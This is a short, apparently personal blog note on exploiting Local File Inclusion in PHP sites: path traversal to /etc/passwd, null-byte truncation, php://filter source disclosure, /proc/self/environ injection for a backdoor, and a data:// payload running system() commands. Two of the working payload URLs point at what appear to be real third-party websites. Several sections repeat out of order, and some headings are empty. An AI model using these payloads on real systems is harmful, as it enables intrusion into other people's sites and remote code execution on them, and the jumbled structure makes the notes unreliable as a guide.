Web Tricks -- LFI
Local File inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
4. log file inclusion
5. data:// wrapper
This can inject things I want to execute into url.
1. Simple Version
http://vulnerable_host/preview.php?file=../../../../etc/passwd
Try to dump the files that we can't access.
If the source append something after the file we provide, we can use '%00' to mark the end of a string and pass it.
2. php://filter
3. /proc/self/environ
This can achieve RCE (Remote Code Execution)
If /proc/self/environ is included, the things in HTTP_USER_AGENT can be executed. Thus, we can create a file and create backdoor.
If the source append something after the file we provide, we can use '%00' to mark the end of a string and pass it.
2. php://filter
http://www.bihtapublicschool.co.in/index.php?token=php://filter/convert.base64-encode/resource=index
3. /proc/self/environ
This can achieve RCE (Remote Code Execution)
If /proc/self/environ is included, the things in HTTP_USER_AGENT can be executed. Thus, we can create a file and create backdoor.
4. log file inclusion
5. data:// wrapper
This can inject things I want to execute into url.
http://www.zamenfeld.com.ar/main.php?pagina=data:text/plain,<?system($_GET['x']);?>&x=ls
Tutorials and reference:
留言
張貼留言